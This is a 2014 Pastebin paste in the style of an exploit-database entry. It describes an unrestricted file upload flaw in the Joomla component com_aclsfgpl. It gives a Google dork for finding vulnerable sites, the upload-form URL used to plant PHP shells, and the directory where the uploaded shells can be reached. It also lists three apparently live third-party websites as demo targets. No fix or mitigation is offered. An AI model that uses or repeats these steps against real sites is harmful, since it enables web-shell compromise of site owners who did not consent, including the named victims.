API tools faq
paste
Advertisement
1337_Brain

Joomla Component com_aclsfgpl File Upload Vulnerability

1337_Brain
Jul 11th, 2014
486
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.02 KB | None | 0 0
raw download clone embed print report
  1. Joomla Component com_aclsfgpl File Upload Vulnerability
  2. [+] Author: TUNISIAN CYBER
  3. [+] Exploit Title: Joomla Component com_aclsfgpl File Upload Vulnerability
  4. [+] Date: 07-01-2014
  5. [+] Category: WebApp
  6. [+] Google Dork: :inurl:"index.php?option=com_aclsfgpl" add_form
  7. [+] Tested on: KaliLinux
  8. [+} Friend's blog: http://www.na3il.com
  9.  
  10. ################################################################################​########
  11. +Exploit:
  12. You can upload file (.php/.php.jpg...)
  13. +P.O.C:
  14. 127.0.0.1/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form
  15.  
  16. Shell path:
  17. copy shell pic link or 127.0.0.1/components/com_aclsfgpl/photos/
  18.  
  19. Demo:
  20. http://www.club-plonxgee.com/index.php?option=com_aclsfgpl&Itemid=155&ct=womenm&md=add_form
  21. http://www.triclubsxandiego.org/index.php?option=com_aclsfgpl&Itemid=269&ct=tcsd1&md=add_form
  22. http://aero.decinexs.free.fr/modelisme/index.php?option=com_aclsfgpl&Itemid=90&ct=pet5&md=add_form
  23.  
  24. ./3nD
  25. ################################################################################​########
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!